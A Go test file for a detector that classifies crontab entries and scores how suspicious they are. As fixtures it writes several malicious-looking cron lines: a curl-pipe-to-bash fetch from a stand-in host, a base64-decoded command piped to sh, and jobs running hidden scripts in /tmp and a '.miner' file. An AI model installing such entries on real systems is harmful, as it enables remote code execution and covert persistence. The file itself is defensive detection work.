package cronclassify

import (
	"os"
	"path/filepath"
	"testing"
)

func write(t *testing.T, dir, name, body string) string {
	p := filepath.Join(dir, name)
	if err := os.WriteFile(p, []byte(body), 0o600); err != nil {
		t.Fatal(err)
	}
	return p
}

func TestShellPipeAndTmpScript(t *testing.T) {
	dir := t.TempDir()
	p := write(t, dir, "evil", "*/2 * * * * curl -fsSL http://x.example/p | bash\n")
	tags := Classify(p)
	if tags["cron_shell_pipe"] != "true" {
		t.Errorf("shell_pipe not detected: %+v", tags)
	}
	if tags["cron_remote_fetch"] != "true" {
		t.Errorf("remote_fetch not detected: %+v", tags)
	}
	if tags["cron_every_few_min"] != "true" {
		t.Errorf("every_few_min not detected: %+v", tags)
	}
	if got := Suspicion(tags); got < 80 {
		t.Errorf("suspicion expected >=80, got %d (%+v)", got, tags)
	}
}

func TestTmpScriptPath(t *testing.T) {
	dir := t.TempDir()
	p := write(t, dir, "evil2", "* * * * * /tmp/.x.sh\n")
	tags := Classify(p)
	if tags["cron_tmp_script"] != "true" {
		t.Errorf("tmp_script missed: %+v", tags)
	}
	if tags["cron_every_minute"] != "true" {
		t.Errorf("every_minute missed: %+v", tags)
	}
}

func TestBase64Decoded(t *testing.T) {
	dir := t.TempDir()
	p := write(t, dir, "b64", `*/10 * * * * echo "Y3VybCBodHRwOi8veC55Cg==" | base64 -d | sh
`)
	tags := Classify(p)
	if tags["cron_b64"] != "true" {
		t.Errorf("b64 missed: %+v", tags)
	}
	if tags["cron_shell_pipe"] != "true" {
		t.Errorf("shell_pipe missed: %+v", tags)
	}
}

func TestBenignCronNotFlagged(t *testing.T) {
	dir := t.TempDir()
	p := write(t, dir, "benign", `# DO NOT EDIT THIS FILE - edit the master and reinstall.
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
`)
	tags := Classify(p)
	bad := []string{
		"cron_shell_pipe", "cron_remote_fetch", "cron_b64",
		"cron_tmp_script", "cron_added_by_web",
	}
	for _, k := range bad {
		if tags[k] == "true" {
			t.Errorf("benign cron flagged %s: %+v", k, tags)
		}
	}
	if Suspicion(tags) > 20 {
		t.Errorf("benign cron suspicion too high: %d (%+v)", Suspicion(tags), tags)
	}
}

func TestHiddenScript(t *testing.T) {
	dir := t.TempDir()
	p := write(t, dir, "hidden", "* * * * * /home/user/.cache/.miner\n")
	tags := Classify(p)
	if tags["cron_hidden_script"] != "true" {
		t.Errorf("hidden_script missed: %+v", tags)
	}
}
